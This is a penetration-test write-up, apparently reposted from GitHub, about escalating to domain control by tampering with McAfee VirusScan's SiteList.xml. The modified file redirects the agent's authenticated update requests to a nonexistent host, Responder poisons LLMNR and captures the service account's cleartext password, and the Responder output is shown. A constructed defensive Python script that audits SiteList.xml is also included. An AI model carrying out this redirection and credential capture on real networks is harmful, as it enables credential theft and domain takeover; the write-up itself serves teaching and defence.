Original: https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
During a penetration test I did as an intern, I found a nice way to escalate privileges as a domain user. My work machine had McAfee VirusScan Enterprise 8.8i installed, and I only had a low-privilege account.
McAfee lets you define custom update servers, which the agent reaches over HTTP or SMB. The file SiteList.xml (in C:\ProgramData\McAfee\Common Framework\) holds some interesting information, including a few internal server names ...
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">
<HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0"
Server="update.nai.com:80">
<RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth>
<UserName></UserName>
<Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password>
</HttpSite>
<UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</UNCSite>
<UNCSite Type="repository" Name="Tokyo" Order="18" Server="tokyo000" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</UNCSite>
</SiteList></ns:SiteLists>
Let's see what privileges the McAfeeService user has.
PS C:\Users\TAirane> net user McAfeeService /domain
The request will be processed at a domain controller for domain companydomain.
User name                    McAfeeService
Full Name                    McAfee ePO
Comment                      Service Account for ePO Replication
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            29/01/2007 16:03:12
Password expires             Never
Password changeable          29/01/2007 16:03:12
Password required            Yes
User may change password     Yes
Workstations allowed         All
logon script
User profile
Home directory
Last logon                   29/01/2016 17:55:09
logon hours allowed          All
Local Group Memberships      *All Repository          *Repository
Global Group memberships     *Domain Services Account *Workstations Administrator
                             *Servers Administrator   *Domain Users
The command completed successfully.
Unfortunately, the AV is protected by a GUI password, so I could not edit the file through the console. However, I installed a fresh copy of McAfee in my VM and overwrote the SiteList.xml on my work machine with my own.
At that point I knew I was almost there. I modified the file to look roughly like the following, then used Responder to answer the HTTP requests.
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">
<HttpSite Type="fallback" Name="PWNED!" Order="26" Enabled="1" Local="0"
Server="fuckingrandomserver:80">
<RelativePath>LICORNE</RelativePath><UseAuth>1</UseAuth>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</HttpSite>
</SiteList></ns:SiteLists>
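The root cause here is that SiteList.xml carries a service-account credential and the agent will present it to whatever host answers for the configured server name, so a writable or tampered SiteList.xml turns into a credential leak. The following Python audit script is an added example written for this page, not code from the original post or from McAfee: it parses the SiteList.xml format shown above and flags entries that store credentials, entries whose server is not on an approved repository list (the symptom of a tampered file), and accounts shared across several repositories. The approved-server list and the two embedded sample files are constructed for this example, mirroring the original and modified files above with placeholder host names and password values.

```python
"""Audit a McAfee Agent SiteList.xml for risky update-repository entries.

Added example (not from the original post). The sample documents and the
approved-server set below are constructed; host names and password
strings are placeholders, not real values.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample mirroring the original file: one vendor HTTP fallback
# (anonymous) and two internal UNC repositories that use a service account.
ORIGINAL_SITELIST = """<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">
<HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0" Server="update.nai.com:80">
<RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth>
<UserName></UserName><Password Encrypted="1">XXXXXXXX</Password>
</HttpSite>
<UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName><UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYY</Password>
</UNCSite>
<UNCSite Type="repository" Name="Tokyo" Order="18" Server="tokyo000" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName><UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYY</Password>
</UNCSite>
</SiteList></ns:SiteLists>"""

# Constructed sample mirroring the modified file: an HTTP site pointing at an
# unknown host, with authentication turned on and the same service account.
TAMPERED_SITELIST = """<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">
<HttpSite Type="fallback" Name="Tampered" Order="26" Enabled="1" Local="0" Server="unknown-host:80">
<RelativePath>Updates</RelativePath><UseAuth>1</UseAuth>
<UserName>McAfeeService</UserName><Password Encrypted="1">YYYYYYYY</Password>
</HttpSite>
</SiteList></ns:SiteLists>"""

# Hosts the organisation actually uses as update repositories (constructed).
APPROVED_SERVERS = {"update.nai.com", "paris001", "tokyo000"}


def _site_entries(xml_text):
    """Yield every HttpSite/UNCSite element. Only the root carries the
    naSiteList namespace; the site elements are unqualified."""
    root = ET.fromstring(xml_text)
    for sitelist in root.findall("SiteList"):
        for site in sitelist:
            if site.tag in ("HttpSite", "UNCSite"):
                yield site


def _stores_credentials(site):
    """True when the agent authenticates with a configured account rather
    than anonymously (HTTP) or as the logged-on user (UNC)."""
    user = (site.findtext("UserName") or "").strip()
    pw = site.find("Password")
    has_secret = pw is not None and (pw.text or "").strip() != ""
    if site.tag == "HttpSite":
        enabled = site.findtext("UseAuth", "0").strip() == "1"
    else:  # UNCSite: UseLoggedonUserAccount=0 means explicit credentials
        enabled = site.findtext("UseLoggedonUserAccount", "1").strip() == "0"
    return enabled and (bool(user) or has_secret)


def audit_sitelist(xml_text, approved_servers):
    """Return a list of (severity, site_name, message) findings."""
    findings = []
    accounts = defaultdict(list)  # account -> names of sites that use it
    for site in _site_entries(xml_text):
        if site.get("Enabled") != "1":
            continue  # disabled entries are never contacted
        name = site.get("Name", "?")
        server = site.get("Server", "")
        host = server.split(":")[0].lower()
        if host not in approved_servers:
            findings.append(("HIGH", name,
                             f"update server '{server}' is not an approved repository"))
        if _stores_credentials(site):
            domain = (site.findtext("DomainName") or "").strip()
            user = (site.findtext("UserName") or "").strip()
            account = f"{domain}\\{user}" if domain else user
            accounts[account].append(name)
            findings.append(("MEDIUM", name,
                             f"stores credentials for '{account}'; the agent will "
                             f"present them to whatever answers for '{host}'"))
    for account, names in accounts.items():
        if len(names) > 1:
            findings.append(("LOW", ",".join(names),
                             f"account '{account}' is shared by {len(names)} repositories"))
    return findings


if __name__ == "__main__":
    for label, doc in (("original", ORIGINAL_SITELIST), ("tampered", TAMPERED_SITELIST)):
        print(f"== {label} ==")
        for severity, name, msg in audit_sitelist(doc, APPROVED_SERVERS):
            print(f"[{severity}] {name}: {msg}")
```

Run against the original-style file, the script reports only the stored service-account credential (and its reuse across both repositories); against the modified file it raises a HIGH finding for the unapproved server plus the credential that would be sent to it. In practice the approved-server set would come from the ePO configuration, and the same check belongs alongside a file-integrity or ACL check on SiteList.xml, since a low-privilege user being able to overwrite it is what made the redirection possible.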
I clicked to update the McAfee virus definitions and started Responder.
root@kali:~/Tools/responder# python Responder.py -I eth0 --basic
NBT-NS,LLMNR & MDNS Responder 2.3
Original work by Laurent Gaffie (lgaffie@trustwave.com)
To kill this script hit CRTL-C
...
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    sql server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [ON]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [ON]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]
[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.169.140]
    Challenge set              [1122334455667788]
[+] Listening for events...
[*] [LLMNR]Poisoned answer sent to 192.168.169.141 for name fuckingrandomserver
[HTTP] Basic Client : 192.168.169.141
[HTTP] Basic Username : McAfeeService
[HTTP] Basic Password : *\cool_its_a_strong_password/*
Holy crap, I got it! I now have control of the domain.
Mission accomplished!